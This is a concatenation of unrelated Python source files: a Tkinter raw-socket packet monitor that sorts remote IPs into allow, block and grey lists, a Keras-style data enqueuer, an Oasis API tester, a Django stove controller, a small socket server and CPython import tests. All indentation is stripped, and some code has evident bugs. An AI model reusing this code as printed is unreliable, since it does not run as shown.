photo=ImageTk.PhotoImage(image)
viewip = Button(border_buttons, width=70,height=32,image=photo,command=ipTables)
viewip.image=photo
viewip.pack(side="left",ipadx=10,pady=7)
image2 = Image.open(os.path.join(subdirectory1,"Parse.png"))
image2 = image2.resize((90,32), Image.BICUBIC)
photo2 = ImageTk.PhotoImage(image2)
parseButton = Button(border_buttons, image=photo2, width=70, height=32,command=parseClick)
parseButton.image=photo2
parseButton.pack(side="left",ipadx=10,pady=7)
def eth_addr(a):
b = "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % (ord(a[0]), ord(a[1]), ord(a[2]), ord(a[3]), ord(a[4]), ord(a[5]))
return b
class IPSniff:
def __init__(self, interface_name, on_ip_incoming, on_ip_outgoing):
self.interface_name = interface_name
self.on_ip_incoming = on_ip_incoming
self.on_ip_outgoing = on_ip_outgoing
# The raw in (listen) socket is a L2 raw socket that listens
# for all packets going through a specific interface.
self.ins = socket.socket(
socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2 ** 30)
self.ins.bind((self.interface_name, ETH_P_ALL))
mainUI()
parseUI()
def __process_ipframe(self, pkt_type, ip_header, payload):
# Extract the 20 bytes IP header, ignoring the IP options
fields = struct.unpack("!BBHHHBBHII", ip_header)
dummy_hdrlen = fields[0] & 0xf
iplen = fields[2]
ip_src = payload[12:16]
ip_dst = payload[16:20]
ip_frame = payload[0:iplen]
if pkt_type == socket.PACKET_OUTGOING:
if self.on_ip_outgoing is not None:
self.on_ip_outgoing(ip_src, ip_dst, ip_frame)
else:
if self.on_ip_incoming is not None:
self.on_ip_incoming(ip_src, ip_dst, ip_frame)
def recv(self):
while True:
if (pSniff==0):
pkt, sa_ll = self.ins.recvfrom(MTU)
if type == socket.PACKET_OUTGOING and self.on_ip_outgoing is None:
continue
elif self.on_ip_outgoing is None:
continue
if len(pkt) <= 0:
break
eth_header = struct.unpack("!6s6sH", pkt[0:14])
dummy_eth_protocol = socket.ntohs(eth_header[2])
if eth_header[2] != 0x800:
continue
ip_header = pkt[14:34]
payload = pkt[14:]
self.__process_ipframe(sa_ll[2], ip_header, payload)
time.sleep(0.1)
class sniffThread(Thread):
def __init__(self,iface):
self.interface=iface
super(sniffThread, self).__init__()
self.stoprequest = Event()
def run(self):
while not self.stoprequest.isSet():
try:
ip_sniff.interface=self.interface
ip_sniff.recv()
except Queue.Empty:
continue
def chInterface(self):
global interface, pSniff
selectInterface()
pSniff = 1
ifs = all_interfaces()
chmsg = "Enter Interface you want to sniff on:\n"
chtitle = "Interface selection"
chchoices = ["", "", "", "", "", "", ""]
chcount = 0
for i in ifs:
# print "%12s %s" % (i[0], format_ip(i[1]))
chmsg += str(i[0])
chchoices[chcount] = str(i[0])
# Listbox.insert(listbox, str(i[0]))
chcount += 1
chmsg += " "
chmsg += str(format_ip(i[1]))
chmsg += "\n"
interface = easygui.choicebox(chmsg, chtitle, chchoices)
self.interface=interface
ip_sniff.interface=interface
def stahp(self, timeout=None):
global pSniff
pSniff = 1
class parseThread(Thread):
def __init__(self, tip):
self.testip = tip
super(parseThread, self).__init__()
self.stoprequest = Event()
def run(self):
try:
callParse(self.testip)
except Exception:
sys.exit()
def stahp(self, timeout=None):
global pParse
pParse = 1
# Example code to use IPSniff
def test_incoming_callback(src, dst, border_in):
global inc_txt_str, inc_packet, inc_packet_size
#print("Incoming: Source=%s, Dest=%s, Len = %d \nFrame data: %s\n\n" %(socket.inet_ntoa(src), socket.inet_ntoa(dst), len(border_in), border_in))
main_win.deiconify()
t.configure(state=NORMAL)
inc_txt_str += "Incoming from "
inc_txt_str += str(socket.inet_ntoa(src))
#inc_txt_str += ", Dest="
#inc_txt_str += str(socket.inet_ntoa(dst))
inc_txt_str += ", Len = "
inc_txt_str += str(len(border_in))
inc_txt_str += "\n"
inc_packet = inc_packet + 1
inc_packet_size = inc_packet_size + len(border_in)
inc_packet_string = "Incoming packets: " + str(inc_packet) + " Total downloaded: " + str(float("{0:.2f}".format(inc_packet_size/1024))) + "kB"
inpCount.set(str(inc_packet_string))
#inc_txt_str += str(border_in)
main_win.update_idletasks()
#print inc_txt_str
t.insert(END, inc_txt_str)
t.see(END)
t.update_idletasks()
testip = socket.inet_ntoa(src)
writeToParse(testip)
t.configure(state=DISABLED)
def writeToParse(testip):
global thrParse
#thrParse = Thread(target=callParse, args=(testip,))
thrParse = parseThread(testip)
thrParse.start()
def callParse(tstip):
ip_local = get_ip_address(interface)
loctet = ip_local.rfind('.')
subnet = ip_local[0:loctet]
cloctet = tstip.rfind('.')
csubnet = tstip[0:cloctet]
with open(os.path.join(subdirectory, "parseip.db"), 'a') as text_file:
t2.configure(state=NORMAL)
if not str(csubnet) == str(subnet):
#text_file.write(str(tstip))
#text_file.write("\n")
t2.insert(END, tstip)
t2.insert(END, ": ")
try:
sitename=socket.gethostbyaddr(str(tstip))
sitename=sitename[0]
sitename=str(sitename)
if any (x in sitename for x in wl):
with open(os.path.join(subdirectory, "whitelist.db"), 'r') as wl_IPs:
try:
ipList=wl_IPs.read()
ipList.index(str(tstip)) > -1
except:
with open(os.path.join(subdirectory, "whitelist.db"), 'a') as wlList:
wlList.write(str(tstip))
wlList.write("\n")
addtoWL = str(tstip) + "\t" + sitename + "\n"
whiteltext.configure(state=NORMAL)
whiteltext.insert(END, addtoWL)
whiteltext.see(END)
whiteltext.update_idletasks()
whiteltext.configure(state=DISABLED)
elif any (x in sitename for x in bl):
with open(os.path.join(subdirectory, "blacklist.db"), 'r') as bl_IPs:
try:
ipList=bl_IPs.read()
ipList.index(str(tstip)) > -1
except:
with open(os.path.join(subdirectory, "blacklist.db"), 'a') as blList:
blList.write(str(tstip))
blList.write("\n")
addtoBL = str(tstip) + "\t" + sitename + "\n"
blackltext.configure(state=NORMAL)
blackltext.insert(END, addtoBL)
blackltext.see(END)
blackltext.update_idletasks()
blackltext.configure(state=DISABLED)
else:
with open(os.path.join(subdirectory, "greylist.db"), 'r') as gl_IPs:
try:
ipList=gl_IPs.read()
ipList.index(str(tstip)) > -1
except:
with open(os.path.join(subdirectory, "greylist.db"), 'a') as glList:
glList.write(str(tstip))
glList.write("\n")
addtoGL = str(tstip) + "\t" + sitename + "\n"
greyltext.configure(state=NORMAL)
greyltext.insert(END, addtoGL)
greyltext.see(END)
greyltext.update_idletasks()
greyltext.configure(state=DISABLED)
except socket.herror:
with open(os.path.join(subdirectory, "parseip.db"), 'r') as check_file:
ipList=check_file.read()
ipList=str(ipList)
try:
ipList.index(str(tstip)) > -1
sitename="Unknown, already added to parsing list"
except:
sitename="Unknown, added to parsing list"
text_file.write(str(tstip))
text_file.write("\n")
tpi.configure(state=NORMAL)
tpi.insert(END, str(tstip))
tpi.insert(END, "\t\t")
tpi.see(END)
tpi.update_idletasks()
tpi.configure(state=DISABLED)
t2.configure(state=NORMAL)
t2.insert(END, sitename)
t2.insert(END, "\n")
t2.see(END)
t2.update_idletasks()
t2.configure(state=DISABLED)
def test_outgoing_callback(src, dst, border_in):
global out_txt_str, out_packet, out_packet_size
t1.configure(state=NORMAL)
main_win.deiconify()
#print("Outgoing: Source=%s, Dest=%s, Len = %d \nFrame data: %s\n\n" %(socket.inet_ntoa(src), socket.inet_ntoa(dst), len(border_in), border_in))
out_txt_str += "Outgoing to "
#out_txt_str += str(socket.inet_ntoa(src))
#out_txt_str += ", Dest="
out_txt_str += str(socket.inet_ntoa(dst))
out_txt_str += ", Len = "
out_txt_str += str(len(border_in))
out_txt_str += "\n"
out_packet = out_packet + 1
out_packet_size = out_packet_size + len(border_in)
out_packet_string = "Outgoing packets: " + str(out_packet) + " Total uploaded: " + str(float("{0:.2f}".format(out_packet_size/1024))) + "kB"
outpCount.set(str(out_packet_string))
#inc_txt_str += str(border_in)
#frame_out.update_idletasks()
#print inc_txt_str
t1.insert(END, out_txt_str)
t1.see(END)
t1.update_idletasks()
testip = socket.inet_ntoa(dst)
writeToParse(testip)
t1.configure(state=DISABLED)
def format_ip(addr):
return str(ord(addr[0])) + '.' + \
str(ord(addr[1])) + '.' + \
str(ord(addr[2])) + '.' + \
str(ord(addr[3]))
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def selectInterface():
global interface, ip_sniff, thrSniff, pSniff
ifs = netifaces.interfaces()
chmsg = "Enter Interface you want to sniff on:\n"
chtitle = "Interface selection"
chchoices = ["", "", "", "", "", "", ""]
chcount = 0
for i in ifs:
# print "%12s %s" % (i[0], format_ip(i[1]))
chmsg += str(i)
chchoices[chcount] = str(i)
# Listbox.insert(listbox, str(i[0]))
chcount += 1
chmsg += " "
addrs = netifaces.ifaddresses(str(i))
try:
ipaddrs = addrs[netifaces.AF_INET]
#chmsg += str(format_ip(ipaddrs))
chmsg += " "
chmsg += str(ipaddrs[0]['addr'])
chmsg += "\n"
except:
chmsg += " "
chmsg += "Interface Not Up\n"
interface = easygui.choicebox(chmsg, chtitle, chchoices)
ip_sniff = IPSniff(interface, test_incoming_callback, test_outgoing_callback)
#thrSniff = Thread(target=ip_sniff.recv, args=())
thrSniff = sniffThread(interface)
thrSniff.start()
pSniff = 0
selectInterface()
mainloop()
|
data_util.py
|
'''
this file is modified from keras implemention of data process multi-threading,
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
|
api_tester_old.py
|
from __future__ import print_function
# Python 2 standard library imports
import argparse
import json
import logging
import os
import shutil
import sys
import threading
import uuid
# Oasis Api import
from oasislmf.api_client.client import OasisAPIClient
'''
Test utility for running a model analysis using the Oasis API.
'''
parser = argparse.ArgumentParser(description='Test the Oasis API client.')
parser.add_argument(
'-i', '--api_ip', metavar='N', type=str, required=True,
help='The oasis API IP address.')
parser.add_argument(
'-a', '--analysis_settings_json', type=str, required=True,
help="The analysis settings JSON file.")
parser.add_argument(
'-d', '--input_data_directory', type=str, required=True,
help="The input data directory.")
parser.add_argument(
'-o', '--output_data_directory', type=str, required=True,
help="The output data directory.")
parser.add_argument(
'-n', '--num_analyses', metavar='N', type=int, default='1',
help='The number of analyses to run.')
parser.add_argument(
'-v', '--verbose', action='store_true',
help='Verbose logging.')
args = parser.parse_args()
api_ip = args.api_ip
analysis_settings_json_filepath = args.analysis_settings_json
num_analyses = args.num_analyses
input_data_directory = args.input_data_directory
output_data_directory = args.output_data_directory
do_verbose = args.verbose
api_url = 'http://{}'.format(api_ip)
if not os.path.exists(input_data_directory):
print("Input data directory does not exist: {}".format(analysis_settings_json_filepath))
exit()
if not os.path.exists(analysis_settings_json_filepath):
print("Analysis settings file does not exist: {}".format(analysis_settings_json_filepath))
exit()
if not os.path.exists(output_data_directory):
os.makedirs(output_data_directory)
num_failed = 0
num_completed = 0
if do_verbose:
log_level = logging.DEBUG
log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
else:
log_level = logging.INFO
log_format = ' %(message)s'
logging.basicConfig(stream=sys.stdout, level=log_level, format=log_format)
# Parse the analysis settings file
with open(analysis_settings_json_filepath) as file:
analysis_settings = json.load(file)
do_il = bool(analysis_settings['analysis_settings']["il_output"])
class Counter:
def __init__(self):
self.num_failed = 0
self.num_completed = 0
def increment_num_completed(self):
self.num_completed = self.num_completed + 1
def increment_num_failed(self):
self.num_failed = self.num_failed + 1
def run_analysis(c):
try:
upload_directory = os.path.join("upload", str(uuid.uuid1()))
shutil.copytree(
os.path.join(input_data_directory, "csv"),
upload_directory)
client = OasisAPIClient(api_url, logging.getLogger())
input_location = client.upload_inputs_from_directory(
upload_directory, do_il, do_validation=False)
client.run_analysis(
analysis_settings, input_location,
output_data_directory, do_clean=False)
c.increment_num_completed()
except Exception:
logging.exception("API test failed")
c.increment_num_failed()
analysis_threads = list()
c = Counter()
for analysis_id in range(num_analyses):
analysis_threads.append(
threading.Thread(target=run_analysis, args=[c])
)
for t in analysis_threads:
t.start()
for t in analysis_threads:
t.join()
print("Done. Num completed={}; Num failed={}".format(c.num_completed, c.num_failed))
|
models.py
|
from django.db import models
import multiprocessing
from .send_command import ProcessSendCommand
from django.conf import settings
class PelletStoveCmd():
def __init__(self):
self.send_commands = False
self.fan1_speed = 5
self.fan2_speed = 5
self.flame_power = 3
self.mode = True
self.QueueCmd = multiprocessing.Queue()
self.p1 = multiprocessing.Process(target=ProcessSendCommand, args=(self.QueueCmd, settings.DATA_ENV['REMOTE_ID']))
self.p1.start()
def SendCommand(self):
self.QueueCmd.put(self.ConvertRequestToDict(), block=False)
def ConvertRequestToDict(self):
d = {"send_commands": self.send_commands,
"fan1_speed": self.fan1_speed,
"fan2_speed": self.fan2_speed,
"flame_power": self.flame_power,
"mode": self.mode}
return d
def __str__(self) -> str:
s = 'send_commands = {0}\n'.format(self.send_commands)
s += 'fan1_speed = {0}\n'.format(self.fan1_speed)
s += 'fan2_speed = {0}\n'.format(self.fan2_speed)
s += 'flame_power = {0}\n'.format(self.flame_power)
s += 'mode = {0}\n'.format(self.mode)
return s
|
server.py
|
import socket
import threading
import time
def logicka(request):
print("request",request)
superUser = 0
places = []
if request=='1'or '0':
if request == '1':
superUser=1
concerts = ["Imagine Dragons", "Tarkov", "KINO", "Kazah-Han", "Coiner"]
if superUser==1:
places = ["Ряды 1-5: 500 рублей", "Ряды 6-9: 400 рублей", "Ряды 10-15: 200 рублей", "Партер 700 рублей"]
if superUser==0:
places = ["Ряды 1-5: 1000 рублей", "Ряды 6-9: 800 рублей", "Ряды 10-15: 600 рублей", "Партер 1500 рублей"]
else:print('aaaa')
rg = bytes(str([concerts, places]), 'utf8')
# rg = b"byte"
response = rg
return response
else:
#S.find(str, [start], [end])
#rg = bytes(str(request.decode('utf-8')), 'utf8')
rg = ascii(request.decode("utf-8"))
buy = request.split('/')
print("\n","buy_____:",buy)
pass
pass
def process_request(conn, addr):
print('connected:', addr)
conn.settimeout(120)
while True:
try:
data = conn.recv(1024)
request = data.decode('utf-8')
response = logicka({ascii(request)})
# print(f'Получен запрос: {ascii(request)}')
# print(f'Отправлен ответ {ascii(response.decode("utf-8"))}')
conn.send(response)
if not data:
time.sleep(1)
except socket.timeout:
print("close connection by timeout")
conn.close()
break
sock = socket.socket()
sock.bind(('', 9090))
sock.listen(1)
while True:
conn, addr = sock.accept()
th = threading.Thread(target=process_request, args=(conn, addr))
th.start()
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import shutil
import subprocess
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import glob
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with test.support.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(sys.prefix, "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
env = None
env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
